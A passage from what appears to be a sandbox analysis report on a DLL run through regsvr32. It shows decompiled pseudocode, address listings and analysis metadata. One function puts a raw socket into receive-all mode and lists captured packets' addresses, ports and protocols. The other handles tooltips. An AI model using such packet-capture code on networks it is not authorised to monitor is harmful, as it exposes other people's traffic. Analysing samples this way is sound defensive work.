				struct tagMSG* _t278;
				char _t284;
				int _t301;
				void* _t302;
				struct HWND__** _t303;
				intOrPtr _t306;
				void* _t307;
				struct HWND__** _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				void* _t315;
				signed int _t316;
				void* _t318;
				signed int _t319;
				intOrPtr* _t323;

				_push(0xffffffff);
				_push(E1005209B);
				_push( *[fs:0x0]);
				_t316 = _t315 - 0x434;
				_t116 =  *0x1006dbdc; // 0xdf7c0cda
				_v16 = _t116 ^ _t316;
				_push(__ebx);
				_push(__ebp);
				_push(__edi);
				_t118 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t118 ^ _t316);
				 *[fs:0x0] =  &_v12;
				_t306 = _a4;
				_t121 = E100173A6();
				_t301 = 0;
				_t323 = _t121;
				_t221 = 0 | _t323 == 0x00000000;
				if(_t323 == 0) {
					_t121 = E10001000(_t221, __edx, 0x80004005);
				}
				_t7 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0xc))))() + 0x10; // 0x10
				_t214 = _t7;
				_v1088 = _t214;
				_t278 =  &_v1076;
				_v4 = _t301;
				_v1084 = _t301;
				if(PeekMessageA(_t278,  *(_t306 + 0x20), 0x10, 0x10, _t301) != 0) {
					L30:
					__imp__#3( *((intOrPtr*)(_t306 + 0x74)));
					_t81 = _t214 - 0x10; // 0x0
					_t126 = _t81;
					_v8 = 0xffffffff;
					asm("lock xadd [ecx], edx");
					_t280 = (_t278 | 0xffffffff) - 1;
					if((_t278 | 0xffffffff) - 1 <= 0) {
						_t280 =  *((intOrPtr*)( *_t126));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t126)) + 4))))(_t126);
					}
					 *[fs:0x0] = _v16;
					_pop(_t302);
					_pop(_t307);
					_pop(_t215);
					return E1003B437(0, _t215, _v20 ^ _t316, _t280, _t302, _t307);
				} else {
					do {
						_t132 = E1003BB70(_t301,  &_v1016, _t301, 0x3e8);
						_t316 = _t316 + 0xc;
						__imp__#16( *((intOrPtr*)(_t306 + 0x74)),  &_v1016, 0x3e8, _t301);
						if(_t132 == 0xffffffff) {
							goto L29;
						} else {
							__imp__#15(_v1030);
							_t135 = SendMessageA( *(_t306 + 0x144), 0x1004, _t301, _t301);
							_t303 = _t306 + 0x124;
							E10026562(_t303, 1, _t135, 0x10056948, 0, 0, 0, 0);
							_t216 = __imp__#12;
							_t137 =  *_t216(_v1052);
							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 1, _t137);
							_t142 =  *_t216(_v1064);
							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 2, _t142);
							_t147 = E10010C40(_v1087 & 0x000000ff);
							_t318 = _t316 + 4;
							_t238 =  &_v1128 - _t147;
							do {
								_t284 =  *_t147;
								 *((char*)(_t238 + _t147)) = _t284;
								_t147 = _t147 + 1;
							} while (_t284 != 0);
							E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 0,  &_v1076);
							_t151 = _v1054;
							__imp__#15(_t151);
							_t217 = (_t151 & 0x0000ffff) + 0xffffffec & 0x0000ffff;
							_t155 = (_v1051 & 0x000000ff) - 1;
							if(_t155 == 0) {
								_v1116 =  &_v1024;
								__eflags = _t217;
							} else {
								_t196 = _t155 - 5;
								if(_t196 == 0) {
									__imp__#15(_v1028);
									_v1120 =  &_v1012;
									E10003500( &_v1124, 0x10058714, _v1028 & 0x0000ffff);
									_t318 = _t318 + 0xc;
									E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 3, _v1124);
									E100019E0( &_v1136);
									_t217 = _t217 + 0xffec;
								} else {
									_t205 = _t196 == 0xb;
									if(_t196 == 0xb) {
										_v1116 =  &_v1020;
										__imp__#15(_v1028);
										E10003500( &_v1124, 0x10058714, _t205 & 0x0000ffff);
										_t318 = _t318 + 0xc;
										E1002637C(_t303, SendMessageA( *(_t306 + 0x144), 0x1004, 0, 0) - 1, 3, _v1124);
										E100019E0( &_v1136);
										_t217 = _t217 + 0xfff8;
									}
								}
							}
							E10003500( &_v1120, 0x10058714, _t217 & 0x0000ffff);
							_t214 = _v1120;
							_t287 =  *(_t306 + 0x144);
							_t316 = _t318 + 0xc;
							E1002637C(_t303, SendMessageA(_t287, 0x1004, 0, 0) - 1, 4, _t214);
							_t243 =  *(_t214 - 0x10);
							_t161 = _t214 - 0x10;
							_v1124 = _t243;
							if( *(_t214 - 0xc) == 0) {
								L20:
								_t162 = _v1116;
								if(_v1116 != 0) {
									E10003500( &_v1120, " %s", _t162);
									_t214 = _v1120;
									_t287 =  *(_t306 + 0x144);
									_t316 = _t316 + 0xc;
									E1002637C(_t303, SendMessageA(_t287, 0x1004, 0, 0) - 1, 5, _t214);
								}
								_t303 =  *(_t214 - 0x10);
								_t163 = _t214 - 0x10;
								if( *(_t214 - 0xc) == 0) {
									goto L29;
								} else {
									_t243 = _t163 + 0xc;
									if( *(_t163 + 0xc) >= 0) {
										asm("lock xadd [ecx], edx");
										__eflags = (_t287 | 0xffffffff) - 1;
										if((_t287 | 0xffffffff) - 1 <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t163)) + 4))))(_t163);
										}
										_t75 =  *((intOrPtr*)( *((intOrPtr*)( *_t303 + 0xc))))() + 0x10; // 0x10
										_t214 = _t75;
										_v1120 = _t214;
										goto L29;
									} else {
										if( *((intOrPtr*)(_t214 - 8)) < 0) {
											goto L33;
										} else {
											 *(_t214 - 0xc) = 0;
											 *_t214 = 0;
											goto L29;
										}
									}
								}
							} else {
								_t287 = _t161 + 0xc;
								if( *(_t161 + 0xc) >= 0) {
									asm("lock xadd [edx], ebx");
									__eflags = (_t214 | 0xffffffff) - 1;
									if((_t214 | 0xffffffff) - 1 <= 0) {
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 4))))(_t161);
										_t243 = _v1116;
									}
									_t287 =  *_t243;
									_t60 =  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0xc))))() + 0x10; // 0x10
									_t214 = _t60;
									_v1120 = _t214;
									goto L20;
								} else {
									if( *((intOrPtr*)(_t214 - 8)) < 0) {
										L33:
										E10001000(_t243, _t287, 0x80070057);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t319 = _t316 - 0xd0;
										_t169 =  *0x1006dbdc; // 0xdf7c0cda
										_v1148 = _t169 ^ _t319;
										_push(_t306);
										_t308 = _t243;
										_t171 = E1002181C(_t214, _t303, _t308, __eflags, 0x10058c8c, 0x24, 0);
										__eflags = _t171 - 6;
										if(_t171 != 6) {
											L39:
											_pop(_t309);
											__eflags = _v1148 ^ _t319;
											return E1003B437(_t171, _t214, _v1148 ^ _t319, _t287, _t303, _t309);
										} else {
											__imp__#23(2, 3, 0, _t303);
											_t308[0x1d] = _t171;
											_t174 = E1003BB70(_t303,  &_v1288, 0, 0x80);
											_t319 = _t319 + 0xc;
											__imp__#52( &_v1288);
											_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t174 + 0xc))));
											__imp__#12( *_t175);
											__imp__#11(_t175);
											_t176 = _t308[0x1d];
											_v1372 = 0xfa0;
											__imp__#21(_t176, 0xffff, 0x1006,  &_v1372, 4);
											_v1336 = 2;
											__imp__#9(0x2bc);
											_t294 = _t308[0x1d];
											_v1338 = _t176;
											_v1336 = _t175;
											__imp__#2(_t308[0x1d],  &_v1340, 0x10);
											__eflags = _t176 - 0xffffffff;
											_pop(_t303);
											_push(0);
											_push(0);
											if(_t176 != 0xffffffff) {
												_t178 = _t308[0x1d];
												_v1404 = 1;
												_v1412 = 0;
												__imp__WSAIoctl(_t178, 0x98000001,  &_v1404, 4,  &_v1392, 0x28,  &_v1412);
												__eflags = _t178 - 0xffffffff;
												_push(0);
												_push(0);
												if(__eflags != 0) {
													_push(0);
													_push(0xfffffff1);
													_push(_t308);
													_push(E10010ED0);
													_t308[0x1e] = E10023C00(_t214,  &_v1404, _t303, _t308, __eflags);
													E1001D39A( &(_t308[0x34]), 0);
													E1001D39A( &(_t308[0x1f]), 1);
													_t254 =  *0x1006f050; // 0x0
													E1000BDC0(_t254);
													_t255 =  *0x1006f050; // 0x0
													_t287 =  &_v1468;
													__eflags = _t255 + 0x2a0;
													E10001310( &_v1468, "Processing2");
													_t171 = E1001614A( &_v1476);
													goto L39;
												} else {
													_t184 = E10018B24(_t308);
													__imp__#3(_t308[0x1d], 0x10058c6c);
													_pop(_t310);
													__eflags = _v1260 ^ _t319;
													return E1003B437(_t184, _t214, _v1260 ^ _t319,  &_v1404, _t303, _t310);
												}
											} else {
												_t186 = E10018B24(_t308);
												_t311 = 0x10058c7c;
												__eflags = _v1220 ^ _t319;
												return E1003B437(_t186, _t214, _v1220 ^ _t319, _t294, _t303, _t311);
											}
										}
									} else {
										 *(_t214 - 0xc) = 0;
										 *_t214 = 0;
										goto L20;
									}
								}
							}
						}
						goto L40;
						L29:
						_t301 = 0;
						_t278 =  &_v1092;
						_v1100 = 0;
					} while (PeekMessageA(_t278,  *(_t306 + 0x20), 0x10, 0x10, 0) == 0);
					goto L30;
				}
				L40:
			}

























































































                                                                                                                0x10010ed0
                                                                                                                0x10010ed2
                                                                                                                0x10010edd
                                                                                                                0x10010ede
                                                                                                                0x10010ee4
                                                                                                                0x10010eeb
                                                                                                                0x10010ef2
                                                                                                                0x10010ef3
                                                                                                                0x10010ef5
                                                                                                                0x10010ef6
                                                                                                                0x10010efd
                                                                                                                0x10010f05
                                                                                                                0x10010f0b
                                                                                                                0x10010f12
                                                                                                                0x10010f19
                                                                                                                0x10010f1b
                                                                                                                0x10010f1d
                                                                                                                0x10010f22
                                                                                                                0x10010f29
                                                                                                                0x10010f29
                                                                                                                0x10010f37
                                                                                                                0x10010f37
                                                                                                                0x10010f3a
                                                                                                                0x10010f47
                                                                                                                0x10010f4c
                                                                                                                0x10010f53
                                                                                                                0x10010f5f
                                                                                                                0x100112b1
                                                                                                                0x100112b5
                                                                                                                0x100112bb
                                                                                                                0x100112bb
                                                                                                                0x100112be
                                                                                                                0x100112cf
                                                                                                                0x100112d3
                                                                                                                0x100112d6
                                                                                                                0x100112da
                                                                                                                0x100112e0
                                                                                                                0x100112e0
                                                                                                                0x100112eb
                                                                                                                0x100112f3
                                                                                                                0x100112f4
                                                                                                                0x100112f6
                                                                                                                0x1001130b
                                                                                                                0x10010f65
                                                                                                                0x10010f70
                                                                                                                0x10010f7b
                                                                                                                0x10010f83
                                                                                                                0x10010f92
                                                                                                                0x10010f9b
                                                                                                                0x00000000
                                                                                                                0x10010fa1
                                                                                                                0x10010fa6
                                                                                                                0x10010fba
                                                                                                                0x10010fca
                                                                                                                0x10010fd4
                                                                                                                0x10010fdd
                                                                                                                0x10010fe4
                                                                                                                0x10011001
                                                                                                                0x1001100b
                                                                                                                0x10011028
                                                                                                                0x10011033
                                                                                                                0x1001103c
                                                                                                                0x1001103f
                                                                                                                0x10011041
                                                                                                                0x10011041
                                                                                                                0x10011043
                                                                                                                0x10011046
                                                                                                                0x10011049
                                                                                                                0x1001106c
                                                                                                                0x10011071
                                                                                                                0x10011076
                                                                                                                0x10011082
                                                                                                                0x1001108a
                                                                                                                0x1001108d
                                                                                                                0x10011164
                                                                                                                0x10011168
                                                                                                                0x10011093
                                                                                                                0x10011093
                                                                                                                0x10011096
                                                                                                                0x10011104
                                                                                                                0x1001111f
                                                                                                                0x10011123
                                                                                                                0x10011132
                                                                                                                0x1001114a
                                                                                                                0x10011153
                                                                                                                0x10011158
                                                                                                                0x10011098
                                                                                                                0x10011098
                                                                                                                0x1001109b
                                                                                                                0x100110aa
                                                                                                                0x100110ae
                                                                                                                0x100110c2
                                                                                                                0x100110d1
                                                                                                                0x100110e9
                                                                                                                0x100110f2
                                                                                                                0x100110f7
                                                                                                                0x100110f7
                                                                                                                0x1001109b
                                                                                                                0x10011096
                                                                                                                0x1001117c
                                                                                                                0x10011181
                                                                                                                0x10011185
                                                                                                                0x1001118b
                                                                                                                0x100111a3
                                                                                                                0x100111ac
                                                                                                                0x100111af
                                                                                                                0x100111b2
                                                                                                                0x100111b6
                                                                                                                0x100111ff
                                                                                                                0x100111ff
                                                                                                                0x10011205
                                                                                                                0x10011212
                                                                                                                0x10011217
                                                                                                                0x1001121b
                                                                                                                0x10011221
                                                                                                                0x10011239
                                                                                                                0x10011239
                                                                                                                0x10011242
                                                                                                                0x10011245
                                                                                                                0x10011248
                                                                                                                0x00000000
                                                                                                                0x1001124a
                                                                                                                0x1001124e
                                                                                                                0x10011251
                                                                                                                0x1001126c
                                                                                                                0x10011271
                                                                                                                0x10011273
                                                                                                                0x1001127d
                                                                                                                0x1001127d
                                                                                                                0x10011288
                                                                                                                0x10011288
                                                                                                                0x1001128b
                                                                                                                0x00000000
                                                                                                                0x10011253
                                                                                                                0x10011257
                                                                                                                0x00000000
                                                                                                                0x1001125d
                                                                                                                0x1001125d
                                                                                                                0x10011264
                                                                                                                0x00000000
                                                                                                                0x10011264
                                                                                                                0x10011257
                                                                                                                0x10011251
                                                                                                                0x100111b8
                                                                                                                0x100111bc
                                                                                                                0x100111bf
                                                                                                                0x100111da
                                                                                                                0x100111df
                                                                                                                0x100111e1
                                                                                                                0x100111eb
                                                                                                                0x100111ed
                                                                                                                0x100111ed
                                                                                                                0x100111f1
                                                                                                                0x100111f8
                                                                                                                0x100111f8
                                                                                                                0x100111fb
                                                                                                                0x00000000
                                                                                                                0x100111c1
                                                                                                                0x100111c5
                                                                                                                0x1001130c
                                                                                                                0x10011311
                                                                                                                0x10011316
                                                                                                                0x10011317
                                                                                                                0x10011318
                                                                                                                0x10011319
                                                                                                                0x1001131a
                                                                                                                0x1001131b
                                                                                                                0x1001131c
                                                                                                                0x1001131d
                                                                                                                0x1001131e
                                                                                                                0x1001131f
                                                                                                                0x10011320
                                                                                                                0x10011326
                                                                                                                0x1001132d
                                                                                                                0x10011334
                                                                                                                0x1001133e
                                                                                                                0x10011340
                                                                                                                0x10011345
                                                                                                                0x10011348
                                                                                                                0x100114ce
                                                                                                                0x100114d5
                                                                                                                0x100114d6
                                                                                                                0x100114e3
                                                                                                                0x1001134e
                                                                                                                0x10011355
                                                                                                                0x10011360
                                                                                                                0x1001136a
                                                                                                                0x1001136f
                                                                                                                0x10011377
                                                                                                                0x10011380
                                                                                                                0x10011385
                                                                                                                0x1001138c
                                                                                                                0x100113a0
                                                                                                                0x100113a9
                                                                                                                0x100113b1
                                                                                                                0x100113bc
                                                                                                                0x100113c3
                                                                                                                0x100113c9
                                                                                                                0x100113d4
                                                                                                                0x100113d9
                                                                                                                0x100113dd
                                                                                                                0x100113e3
                                                                                                                0x100113e6
                                                                                                                0x100113e7
                                                                                                                0x100113e9
                                                                                                                0x100113eb
                                                                                                                0x10011414
                                                                                                                0x1001142b
                                                                                                                0x10011433
                                                                                                                0x1001143b
                                                                                                                0x10011441
                                                                                                                0x10011444
                                                                                                                0x10011446
                                                                                                                0x10011448
                                                                                                                0x10011476
                                                                                                                0x10011478
                                                                                                                0x1001147a
                                                                                                                0x1001147b
                                                                                                                0x1001148d
                                                                                                                0x10011490
                                                                                                                0x1001149a
                                                                                                                0x1001149f
                                                                                                                0x100114a5
                                                                                                                0x100114aa
                                                                                                                0x100114b5
                                                                                                                0x100114ba
                                                                                                                0x100114c0
                                                                                                                0x100114c9
                                                                                                                0x00000000
                                                                                                                0x1001144a
                                                                                                                0x10011451
                                                                                                                0x1001145a
                                                                                                                0x10011460
                                                                                                                0x10011468
                                                                                                                0x10011475
                                                                                                                0x10011475
                                                                                                                0x100113ed
                                                                                                                0x100113f4
                                                                                                                0x100113f9
                                                                                                                0x10011401
                                                                                                                0x1001140e
                                                                                                                0x1001140e
                                                                                                                0x100113eb
                                                                                                                0x100111cb
                                                                                                                0x100111cb
                                                                                                                0x100111d2
                                                                                                                0x00000000
                                                                                                                0x100111d2
                                                                                                                0x100111c5
                                                                                                                0x100111bf
                                                                                                                0x100111b6
                                                                                                                0x00000000
                                                                                                                0x1001128f
                                                                                                                0x10011292
                                                                                                                0x1001129a
                                                                                                                0x1001129f
                                                                                                                0x100112a9
                                                                                                                0x00000000
                                                                                                                0x10010f70
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$inet_ntoa$Peek_memsethtonsrecv
                                                                                                                • String ID: %s$Processing2
                                                                                                                • API String ID: 2681355637-1361235676
                                                                                                                • Opcode ID: cdd757c6b4f9e7ea5c63c7eb1175f28c53492f38c1bdd4e227a2cf65ed6f66fe
                                                                                                                • Instruction ID: 50aedd54bdc28c244f4d6f6d851c8870d4df88a5ac4d8c736e694ce555374ffb
                                                                                                                • Opcode Fuzzy Hash: cdd757c6b4f9e7ea5c63c7eb1175f28c53492f38c1bdd4e227a2cf65ed6f66fe
                                                                                                                • Instruction Fuzzy Hash: AD027C74200740AFE325CB64CC86FABB7E9EB88714F104A1CF2559B2D1DBB5E945CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100392CA Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 323windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100392CA(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t114;
				signed int _t115;
				signed int _t116;
				signed int _t118;
				intOrPtr _t122;
				long _t131;
				signed int _t138;
				signed int _t139;
				void* _t143;
				signed int _t147;
				signed int _t148;
				void* _t156;
				intOrPtr* _t163;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				void* _t181;
				signed short _t190;
				intOrPtr _t192;
				void* _t200;
				void* _t204;
				void* _t205;
				void* _t207;

				_t165 = __ecx;
				_push(0x7c);
				_t109 = E1003D1E6(E10054DD7, __ebx, __edi, __esi);
				_t200 = __ecx;
				 *(_t204 - 0x10) = __ecx;
				_t163 =  *((intOrPtr*)(_t204 + 8));
				_t190 =  *(_t163 + 4);
				 *(_t204 - 0x1c) = _t190;
				if(_t190 == 0x200 || _t190 == 0xa0 || _t190 == 0x202 || _t190 == 0x205 || _t190 == 0x208) {
					if(GetKeyState(1) < 0 || GetKeyState(2) < 0) {
						L49:
						_t190 =  *(_t204 - 0x1c);
						goto L50;
					} else {
						_t109 = GetKeyState(4);
						_t217 = _t109;
						if(_t109 < 0) {
							goto L49;
						} else {
							_t114 = E100231BA(_t163, _t165, GetKeyState, _t200, _t217);
							_push( *_t163);
							_t192 = _t114;
							 *((intOrPtr*)(_t204 - 0x18)) = _t192;
							while(1) {
								_t109 = E10019C16(_t163, _t165, _t204);
								if(_t109 == 0) {
									break;
								}
								__eflags =  *(_t109 + 0x3c) & 0x00000401;
								if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
									break;
								} else {
									_push(GetParent( *(_t109 + 0x20)));
									continue;
								}
							}
							if(_t109 == _t200) {
								_t164 =  *(_t192 + 0x3c);
								_t115 = E10019F01(_t200);
								__eflags = _t164;
								 *(_t204 - 0x14) = _t115;
								if(__eflags == 0) {
									L19:
									_t116 = E100160BC(__eflags, 0x70);
									 *(_t204 - 0x1c) = _t116;
									_t164 = 0;
									__eflags = _t116;
									 *(_t204 - 4) = 0;
									if(__eflags != 0) {
										_t164 = E10038FF9(0, _t116, _t192, _t200, __eflags);
									}
									 *(_t204 - 4) =  *(_t204 - 4) | 0xffffffff;
									_t118 =  *((intOrPtr*)( *_t164 + 0x134))( *(_t204 - 0x14), 1);
									__eflags = _t118;
									if(_t118 != 0) {
										SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
										_t200 =  *(_t204 - 0x10);
										 *(_t192 + 0x3c) = _t164;
										L24:
										E1003BB70(_t192, _t204 - 0x88, 0, 0x30);
										_t122 =  *((intOrPtr*)(_t204 + 8));
										 *((intOrPtr*)(_t204 - 0x24)) =  *((intOrPtr*)(_t122 + 0x18));
										 *(_t204 - 0x28) =  *(_t122 + 0x14);
										ScreenToClient( *(_t200 + 0x20), _t204 - 0x28);
										E1003BB70(_t192, _t204 - 0x58, 0, 0x30);
										_t207 = _t205 + 0x18;
										 *(_t204 - 0x58) = 0x28;
										_t109 =  *((intOrPtr*)( *_t200 + 0x6c))( *(_t204 - 0x28),  *((intOrPtr*)(_t204 - 0x24)), _t204 - 0x58);
										asm("sbb ecx, ecx");
										_t175 =  ~(_t109 + 1) & _t200;
										__eflags =  *(_t192 + 0x44) - _t109;
										 *(_t204 - 0x1c) = _t109;
										 *(_t204 - 0x14) = _t175;
										if( *(_t192 + 0x44) != _t109) {
											L30:
											__eflags = _t109 - 0xffffffff;
											if(_t109 == 0xffffffff) {
												SendMessageA( *(_t164 + 0x20), 0x401, 0, 0);
												L39:
												E1003924C(_t164,  *((intOrPtr*)(_t204 + 8)));
												_t131 =  *(_t192 + 0x48);
												__eflags = _t131;
												if(_t131 != 0) {
													__eflags =  *_t131 - 0x28;
													if( *_t131 >= 0x28) {
														SendMessageA( *(_t164 + 0x20), 0x405, 0, _t131);
													}
												}
												__eflags =  *(_t192 + 0x48);
												 *(_t192 + 0x40) =  *(_t204 - 0x14);
												 *(_t192 + 0x44) =  *(_t204 - 0x1c);
												if(__eflags == 0) {
													 *(_t192 + 0x48) = E100160BC(__eflags, 0x30);
													E1003BB70(_t192, _t134, 0, 0x30);
													_t207 = _t207 + 0x10;
												}
												_t176 = 0xc;
												_t200 = _t204 - 0x58;
												_t109 = memcpy( *(_t192 + 0x48), _t200, _t176 << 2);
												_t192 = _t200 + _t176 + _t176;
												L45:
												__eflags =  *((intOrPtr*)(_t204 - 0x34)) - 0xffffffff;
												if( *((intOrPtr*)(_t204 - 0x34)) != 0xffffffff) {
													__eflags =  *(_t204 - 0x38);
													if(__eflags == 0) {
														_push( *((intOrPtr*)(_t204 - 0x34)));
														_t109 = E1003B59D(_t164, _t192, _t200, __eflags);
													}
												}
												goto L77;
											}
											_t179 = 0xc;
											_t138 = memcpy(_t204 - 0x88, _t204 - 0x58, _t179 << 2);
											_t207 = _t207 + 0xc;
											_t181 =  *(_t204 - 0x10);
											_t139 = _t138 & 0x3fffffff;
											__eflags =  *(_t181 + 0x3c) & 0x00000400;
											 *(_t204 - 0x84) = _t139;
											if(( *(_t181 + 0x3c) & 0x00000400) != 0) {
												_t148 = _t139 | 0x00000020;
												__eflags = _t148;
												 *(_t204 - 0x84) = _t148;
											}
											SendMessageA( *(_t164 + 0x20), 0x404, 0, _t204 - 0x88);
											__eflags =  *(_t204 - 0x54) & 0x40000000;
											if(( *(_t204 - 0x54) & 0x40000000) != 0) {
												L35:
												SendMessageA( *(_t164 + 0x20), 0x401, 1, 0);
												_t143 =  *(_t204 - 0x10);
												__eflags =  *(_t143 + 0x3c) & 0x00000400;
												if(( *(_t143 + 0x3c) & 0x00000400) != 0) {
													SendMessageA( *(_t164 + 0x20), 0x411, 1, _t204 - 0x88);
												}
												SetWindowPos( *(_t164 + 0x20), 0, 0, 0, 0, 0, 0x213);
												goto L38;
											} else {
												_t147 = E1001BFD0(_t164,  *(_t204 - 0x10), 0x400);
												__eflags = _t147;
												if(_t147 == 0) {
													L38:
													_t192 =  *((intOrPtr*)(_t204 - 0x18));
													goto L39;
												}
												goto L35;
											}
										}
										__eflags =  *(_t192 + 0x40) - _t175;
										if( *(_t192 + 0x40) != _t175) {
											goto L30;
										}
										__eflags =  *(_t200 + 0x3c) & 0x00000400;
										if(( *(_t200 + 0x3c) & 0x00000400) == 0) {
											__eflags = _t109 - 0xffffffff;
											if(_t109 != 0xffffffff) {
												_t109 = E1003924C(_t164,  *((intOrPtr*)(_t204 + 8)));
											}
										} else {
											GetCursorPos(_t204 - 0x20);
											_t109 = SendMessageA( *(_t164 + 0x20), 0x412, 0, ( *(_t204 - 0x1c) & 0x0000ffff) << 0x00000010 |  *(_t204 - 0x20) & 0x0000ffff);
										}
										goto L45;
									} else {
										_t109 =  *((intOrPtr*)( *_t164 + 4))(1);
										goto L77;
									}
								}
								_t156 = E1001AD94(_t164);
								__eflags = _t156 -  *(_t204 - 0x14);
								if(_t156 !=  *(_t204 - 0x14)) {
									 *((intOrPtr*)( *_t164 + 0x60))();
									 *((intOrPtr*)( *_t164 + 4))(1);
									_t164 = 0;
									__eflags = 0;
									 *(_t192 + 0x3c) = 0;
								}
								__eflags = _t164;
								if(__eflags != 0) {
									goto L24;
								} else {
									goto L19;
								}
							} else {
								if(_t109 == 0) {
									 *(_t192 + 0x40) =  *(_t192 + 0x40) & _t109;
									 *(_t192 + 0x44) =  *(_t192 + 0x44) | 0xffffffff;
								}
								goto L77;
							}
						}
					}
				} else {
					L50:
					__eflags =  *(_t200 + 0x3c) & 0x00000401;
					if(( *(_t200 + 0x3c) & 0x00000401) == 0) {
						L77:
						return E1003D2BE(_t109);
					}
					_push( *_t163);
					while(1) {
						_t109 = E10019C16(_t163, _t165, _t204);
						__eflags = _t109;
						if(_t109 == 0) {
							break;
						}
						__eflags = _t109 - _t200;
						if(_t109 == _t200) {
							L57:
							__eflags = _t190 - 0x100;
							if(_t190 < 0x100) {
								L59:
								__eflags = _t190 - 0x104 - 3;
								if(_t190 - 0x104 > 3) {
									_t109 = 0;
									__eflags = 0;
									L62:
									__eflags =  *(_t200 + 0x3c) & 0x00000400;
									if(( *(_t200 + 0x3c) & 0x00000400) != 0) {
										goto L77;
									}
									__eflags = _t109;
									if(__eflags != 0) {
										L76:
										_t109 = E10018992(_t165, __eflags, _t109);
										goto L77;
									}
									__eflags = _t190 - 0x201;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x203;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x204;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x206;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x207;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0x209;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa1;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa3;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa4;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa6;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa7;
									if(__eflags == 0) {
										goto L76;
									}
									__eflags = _t190 - 0xa9;
									if(__eflags != 0) {
										goto L77;
									}
									goto L76;
								}
								L60:
								_t109 = 1;
								goto L62;
							}
							__eflags = _t190 - 0x109;
							if(_t190 <= 0x109) {
								goto L60;
							}
							goto L59;
						}
						__eflags =  *(_t109 + 0x3c) & 0x00000401;
						if(( *(_t109 + 0x3c) & 0x00000401) != 0) {
							break;
						}
						_push(GetParent( *(_t109 + 0x20)));
					}
					__eflags = _t109 - _t200;
					if(_t109 != _t200) {
						goto L77;
					}
					goto L57;
				}
			}


























                                                                                                                0x100392ca
                                                                                                                0x100392ca
                                                                                                                0x100392d1
                                                                                                                0x100392d6
                                                                                                                0x100392d8
                                                                                                                0x100392db
                                                                                                                0x100392de
                                                                                                                0x100392e7
                                                                                                                0x100392ea
                                                                                                                0x1003931d
                                                                                                                0x1003960a
                                                                                                                0x1003960a
                                                                                                                0x00000000
                                                                                                                0x10039330
                                                                                                                0x10039332
                                                                                                                0x10039334
                                                                                                                0x10039337
                                                                                                                0x00000000
                                                                                                                0x1003933d
                                                                                                                0x1003933d
                                                                                                                0x10039342
                                                                                                                0x10039344
                                                                                                                0x10039346
                                                                                                                0x1003935d
                                                                                                                0x1003935d
                                                                                                                0x10039364
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003934b
                                                                                                                0x10039351
                                                                                                                0x00000000
                                                                                                                0x10039353
                                                                                                                0x1003935c
                                                                                                                0x00000000
                                                                                                                0x1003935c
                                                                                                                0x10039351
                                                                                                                0x10039368
                                                                                                                0x1003937e
                                                                                                                0x10039383
                                                                                                                0x10039388
                                                                                                                0x1003938a
                                                                                                                0x1003938d
                                                                                                                0x100393b4
                                                                                                                0x100393b6
                                                                                                                0x100393bc
                                                                                                                0x100393bf
                                                                                                                0x100393c1
                                                                                                                0x100393c3
                                                                                                                0x100393c6
                                                                                                                0x100393cf
                                                                                                                0x100393cf
                                                                                                                0x100393d3
                                                                                                                0x100393de
                                                                                                                0x100393e4
                                                                                                                0x100393e6
                                                                                                                0x10039402
                                                                                                                0x10039408
                                                                                                                0x1003940b
                                                                                                                0x1003940e
                                                                                                                0x10039419
                                                                                                                0x1003941e
                                                                                                                0x1003942a
                                                                                                                0x10039434
                                                                                                                0x10039437
                                                                                                                0x10039445
                                                                                                                0x1003944c
                                                                                                                0x1003945b
                                                                                                                0x10039462
                                                                                                                0x1003946a
                                                                                                                0x1003946c
